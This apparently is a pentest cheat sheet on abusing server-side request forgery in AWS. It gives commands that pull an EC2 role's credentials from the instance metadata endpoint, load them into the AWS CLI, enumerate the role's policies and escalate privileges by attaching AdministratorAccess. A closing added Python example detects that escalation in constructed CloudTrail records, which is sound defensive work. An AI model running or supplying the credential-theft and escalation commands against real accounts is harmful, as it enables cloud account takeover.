SSRF / RCE

SSRF

AWS
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/jump-ec2-role
aws configure set aws_access_key_id [key-id] --profile ec2
aws configure set aws_secret_access_key [secret-key] --profile ec2
aws configure set aws_session_token [token] --profile ec2
aws sts get-caller-identity --profile ec2

Get the managed policies attached to the EC2 instance role:

aws iam list-attached-role-policies --role-name jump-ec2-role --profile auditor

List the names of the inline policies embedded in the EC2 instance role:

aws iam list-role-policies --role-name jump-ec2-role --profile auditor

Get the permissions granted by the inline policy:

aws iam get-role-policy --role-name jump-ec2-role --policy-name jump-inline-policy --profile auditor

Escalate privileges by attaching the AdministratorAccess policy to the role itself:

aws iam attach-role-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --role-name jump-ec2-role --profile ec2
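
From the defender's side, the last step leaves a distinctive CloudTrail record: an AttachRolePolicy call whose caller is a session of the very role being modified. The following is an added example, not part of the original page, that flags such records. The sample events are constructed, and the account ID, instance ID, IP addresses and timestamps are placeholders.

```python
ADMIN_ARN = "arn:aws:iam::aws:policy/AdministratorAccess"

def _role_session(role):  # constructed userIdentity for an instance-role session
    return {"type": "AssumedRole",
            "arn": f"arn:aws:sts::111122223333:assumed-role/{role}/i-0example",
            "sessionContext": {"sessionIssuer": {"type": "Role", "userName": role}}}

# Constructed CloudTrail records (not real logs); all ids and IPs are placeholders.
SAMPLE_EVENTS = [
    {"eventTime": "2024-01-01T10:00:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "AttachRolePolicy", "sourceIPAddress": "198.51.100.7",
     "userIdentity": _role_session("jump-ec2-role"),
     "requestParameters": {"roleName": "jump-ec2-role", "policyArn": ADMIN_ARN}},
    {"eventTime": "2024-01-01T10:05:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "AttachRolePolicy", "sourceIPAddress": "198.51.100.7",
     "errorCode": "AccessDenied",  # denied attempts are still worth an alert
     "userIdentity": _role_session("jump-ec2-role"),
     "requestParameters": {"roleName": "jump-ec2-role", "policyArn": ADMIN_ARN}},
    {"eventTime": "2024-01-01T11:00:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "AttachRolePolicy", "sourceIPAddress": "203.0.113.9",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::111122223333:user/admin"},
     "requestParameters": {"roleName": "jump-ec2-role",
                           "policyArn": "arn:aws:iam::aws:policy/ReadOnlyAccess"}},
]

def caller_role(event):
    """Return the role name behind an assumed-role caller, else None."""
    ident = event.get("userIdentity", {})
    if ident.get("type") != "AssumedRole":
        return None
    issuer = ident.get("sessionContext", {}).get("sessionIssuer", {})
    if issuer.get("userName"):
        return issuer["userName"]
    # Fallback: arn:aws:sts::<account>:assumed-role/<role>/<session>
    parts = ident.get("arn", "").split("/")
    return parts[1] if len(parts) >= 3 else None

def find_self_escalation(events):
    """Flag AttachRolePolicy calls where a role session targets its own role."""
    findings = []
    for ev in events:
        if (ev.get("eventSource"), ev.get("eventName")) != ("iam.amazonaws.com", "AttachRolePolicy"):
            continue
        params = ev.get("requestParameters") or {}
        role = caller_role(ev)
        if role is not None and role == params.get("roleName"):
            findings.append({"role": role, "admin": params.get("policyArn") == ADMIN_ARN,
                             "succeeded": "errorCode" not in ev,
                             "sourceIPAddress": ev.get("sourceIPAddress"),
                             "eventTime": ev.get("eventTime")})
    return findings
```
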
